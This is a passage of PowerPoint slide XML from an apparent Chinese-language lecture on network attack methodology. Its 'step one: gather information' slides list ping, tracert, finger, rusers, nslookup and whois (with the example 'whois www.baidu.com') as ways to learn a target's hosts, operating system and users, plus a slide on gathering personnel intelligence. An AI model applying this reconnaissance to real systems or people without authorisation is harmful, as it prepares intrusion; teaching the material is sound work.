                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-22860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fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Ping</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>命令</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>判断计算机是否开着，或者数据包发送到返回需要多少时间</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Tracert</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Tracerout</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>命令</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>跟踪从一台计算机到另外一台计算机所走的路径</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Finger</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Rusers</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>命令</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>收集用户信息</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Host</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>命令，结合</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Finger</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>命令</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>获取主机、操作系统和用户等信息</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Box 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63928987-7F47-4693-86ED-7CBE2C233298}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395288" y="3975100"/>
            <a:ext cx="2327275" cy="519113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-22860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fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>应用的方法：</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E4BB7BDE-AA1C-4958-92B0-F7EDC8610D6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第一步：获取信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="64515" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D00FB4EC-CF33-420B-B7C5-039F83A2A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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54AE39FC-D437-412F-96C9-599D32C5E964}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第一步：获取信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6726BEF-CBB2-479A-B112-DDC54FEF43FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="2817813"/>
            <a:ext cx="8001000" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3333CC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-22860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fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2800" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>whois</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>命令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{612F923E-1901-47DF-9BF8-4CF4A98A092D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="2055813"/>
            <a:ext cx="4343400" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>收集人力资源情报信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BA8B8D8-EC3E-4B80-A58D-428D272C4F8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="4641850"/>
            <a:ext cx="8001000" cy="1598613"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3333CC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-22860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fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2800" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>whois</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> www.baidu.com</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Box 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5E1A857-7DB2-4C40-83AD-CB7CB0D498B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395288" y="3975100"/>
            <a:ext cx="2327275" cy="519113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-22860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fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>应用的方法：</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66DC8ECA-E394-4BF5-8FDC-A9B6C1D6AA27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第一步：获取信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66563" name="图片 2">
            <a:extLst>
